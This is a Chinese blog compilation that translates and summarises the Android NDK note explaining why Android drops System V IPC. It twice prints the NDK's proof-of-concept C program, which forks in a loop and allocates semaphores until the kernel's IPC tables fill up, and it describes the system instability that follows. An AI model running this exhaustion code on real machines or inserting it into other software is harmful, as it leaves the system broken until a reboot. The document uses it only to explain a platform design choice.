Android 不支持 SYSV IPC （SYSV IPC）

Linux IPC总结（全）

http://blog.csdn.net/dxdxsmy/article/details/6653189

http://weimingtom.iteye.com/blog/1169030

【翻译】(17)SYSV IPC

• 博客分类： 
• Android NDK文档自译

 

-----------------

英文文档见android-ndk-r6b的documentation.html

属于Android Native Development Kit (NDK)的一部分

见

http://developer.android.com/sdk/ndk/index.html

翻译仅个人见解

-----------------

 

Android does not support System V IPCs, i.e. the facilities provided by the following standard Posix headers:

 

Android不支持系统五进程间通信。即以下标准Posix头文件提供的工具：（注：Posix是Unix可移植操作系统接口的简称，是一种操作系统的API标准，但不限于Unix）

 

  <sys/sem.h>   /* SysV semaphores 系统五信号量*/

  <sys/shm.h>   /* SysV shared memory segments 系统五内存段*/

  <sys/msg.h>   /* SysV message queues 系统五消息队列*/

  <sys/ipc.h>   /* General IPC definitions 通用进程间通信定义*/

 

The reason for this is due to the fact that, by design, they lead to global kernel resource leakage.

 

之所以要这样做，是因为这样的事实，设计上它们会导致全局内核资源泄漏。

 

For example, there is no way to automatically release a SysV semaphore allocated in the kernel when:

 

例如，没有一种方法自动地释放在内核中分配的系统五信号量，当：

 

- a buggy or malicious process exits

 

- 一个有缺陷或恶意的进程存在。

 

- a non-buggy and non-malicious process crashes or is explicitly killed.

 

- 一个无缺陷且无恶意的进程崩溃或显式地被杀掉。

 

Killing processes automatically to make room for new ones is an important part of Android's application lifecycle implementation. This means that, even assuming only non-buggy and non-malicious code, it is very likely that over time, the kernel global tables used to implement SysV IPCs will fill up.

 

自动杀掉进程以腾出空间给新的进程，是Android应用程序生命周期实现的重要部分。这意味着，即便假设只有无缺陷且无恶意的代码，还是非常可能在不久后，用于实现系统五IPC的内核全局表将被填满。

 

At that point, strange failures are likely to occur and prevent programs that use them to run properly until the next reboot of the system.

 

到那时，奇怪的失败有可能会发生，并且阻止使用它们的程序正常运行，直至下一次系统重启。

 

And we can't ignore potential malicious applications. As a proof of concept here is a simple exploit that you can run on a standard Linux box today:

 

而且，我们不可以忽略潜在的恶意应用程序。作为这个观点的证明，这里有一个简单的漏洞（注：这里应该理解为漏洞或溢出攻击），如今你可以运行它在一个标准Linux机器里：

 

--------------- cut here ------------------------

#include <sys/sem.h>

#include <sys/wait.h>

#include <unistd.h>

#include <stdio.h>

#include <stdlib.h>

#include <errno.h>

 

#define  NUM_SEMAPHORES  32

#define  MAX_FAILS       10

 

int  main(void)

{

    int   counter = 0;

    int   fails   = 0;

 

    if (counter == IPC_PRIVATE)

        counter++;

 

    printf( "%d (NUM_SEMAPHORES=%d)\n", counter, NUM_SEMAPHORES);

 

    for (;;) {

        int  ret = fork();

        int  status;

 

        if (ret < 0) {

            perror("fork:");

            break;

        }

        if (ret == 0) {

            /* in the child 在子进程中*/

            ret = semget( (key_t)counter, NUM_SEMAPHORES, IPC_CREAT );

            if (ret < 0) {

                return errno;

            }

            return 0;

        }

        else {

            /* in the parent 在父进程中*/

            ret = wait(&status); //注：等待，直至其中一个子进程退出

            if (ret < 0) {

                perror("waitpid:");

                break;

            }

            if (status != 0) {

                status = WEXITSTATUS(status);

                fprintf(stderr, "child %d FAIL at counter=%d: %d\n", ret,

                                counter, status);

                if (++fails >= MAX_FAILS)

                    break;

            }

        }

 

        counter++;

        if ((counter % 1000) == 0) {

            printf("%d\n", counter);

        }

        if (counter == IPC_PRIVATE)

            counter++;

    }

    return 0;

}

--------------- cut here ------------------------

 

If you run it on a typical Linux distribution today, you'll discover that it will quickly fill up the kernel's table of unique key_t values, and that strange things will happen in some parts of the system, but not all.

 

今时今日如果你在一个典型的Linux分发版上运行这个程序，你将发现它很快用唯一的key_t值占满内核表，而且将会在系统的某些部分发生奇怪的事情，但不是全部。

 

(You can use the "ipcs -u" command to get a summary describing the kernel tables and their allocations)

 

（你可以使用ipcs -u命令获取一个描述内核表及其分配的概要）

 

（注：ipcs用于提供IPC设施的状态信息，-u表示summary，我在ubuntu上得到的有共享内存，信号量，消息三项）

 

For example, in our experience, anything program launched after that that calls strerror() will simply crash. The USB sub-system starts spoutting weird errors to the system console, etc...

 

例如，以我们的经验看，在发生这种泄漏之后，程序所做的任何事情，一旦其中调用了strerror()就会简单地崩溃。USB子系统开始不断输出奇怪的错误到系统控制台，等等……

http://blog.csdn.net/smfwuxiao/article/details/8521117

Android 不支持 System V IPC， 即下面头文件提供的功能：

  <sys/sem.h>   /* SysV semaphores*/
  <sys/shm.h>   /* SysV shared memory segments */
  <sys/msg.h>   /* SysV message queues */
  <sys/ipc.h>   /* General IPC definitions */

Android不支持SYSV IPC的原因： 会导致全局的内核资源泄漏。例如，当一个有bug的或恶意程序退出后或普通程序被强行杀死后，没有办法自动释放Sysv信号量（在内核中分配的）。然而Android系统经常自动杀死进程，给新的进程腾出空间（Android的重要机制）。这意味着，即使程序没有bug也不是恶意代码，随时间的推移，进程经常被杀死然后重新创建，内核中用于实现SysV IPC的全局表格会被填满。这个时候，就会发生奇怪的事件并导致使用SysV IPC的程序无法运行，只有重启系统。而且考虑到可能有人会故意写恶意程序，所以Android选择不支持SysV IPC。下面提供一个导致内核资源泄漏的程序（需在Linux系统上运行）作为例证：

[cpp]  view plain copy

1. #include <sys/sem.h>  
2. #include <sys/wait.h>  
3. #include <unistd.h>  
4. #include <stdio.h>  
5. #include <stdlib.h>  
6. #include <errno.h>  
7.   
8.   
9. #define  NUM_SEMAPHORES  32  
10. #define  MAX_FAILS       10  
11.   
12.   
13. int  main(void)  
14. {  
15.     int   counter = 0;  
16.     int   fails   = 0;  
17.     if (counter == IPC_PRIVATE)  
18.         counter++;  
19.     printf( "%d (NUM_SEMAPHORES=%d)\n", counter, NUM_SEMAPHORES);  
20.     for (;;) {  
21.         int  ret = fork();  
22.         int  status;  
23.         if (ret < 0) {  
24.             perror("fork:");  
25.             break;  
26.         }  
27.         if (ret == 0) {  
28.             /* in the child */  
29.             ret = semget( (key_t)counter, NUM_SEMAPHORES, IPC_CREAT );  
30.             if (ret < 0) {  
31.                 return errno;  
32.             }  
33.             return 0;  
34.         }  
35.         else {  
36.             /* in the parent */  
37.             ret = wait(&status);  
38.             if (ret < 0) {  
39.                 perror("waitpid:");  
40.                 break;  
41.             }  
42.             if (status != 0) {  
43.                 status = WEXITSTATUS(status);  
44.                 fprintf(stderr, "child %d FAIL at counter=%d: %d\n", ret,  
45.                                 counter, status);  
46.                 if (++fails >= MAX_FAILS)  
47.                     break;  
48.             }  
49.         }  
50.         counter++;  
51.         if ((counter % 1000) == 0) {  
52.             printf("%d\n", counter);  
53.         }  
54.         if (counter == IPC_PRIVATE)  
55.             counter++;  
56.     }  
57.     return 0;  
58. }  

如果上面的程序在当今典型的Linux发行版上编译运行，你会发现该程序将很快地用不同的key_t值占满内核表格，系统将会发生奇怪的事件。但某些Linux系统不一定有该问题（可运行 “ipcs -u” 命令查看内核资源表及资源分配情况）。根据我们的经验，在执行上面程序之后，任何一个程序仅仅调用了 strerror() 就会崩溃。USB子系统不断报告奇怪的错误信息到系统终端等。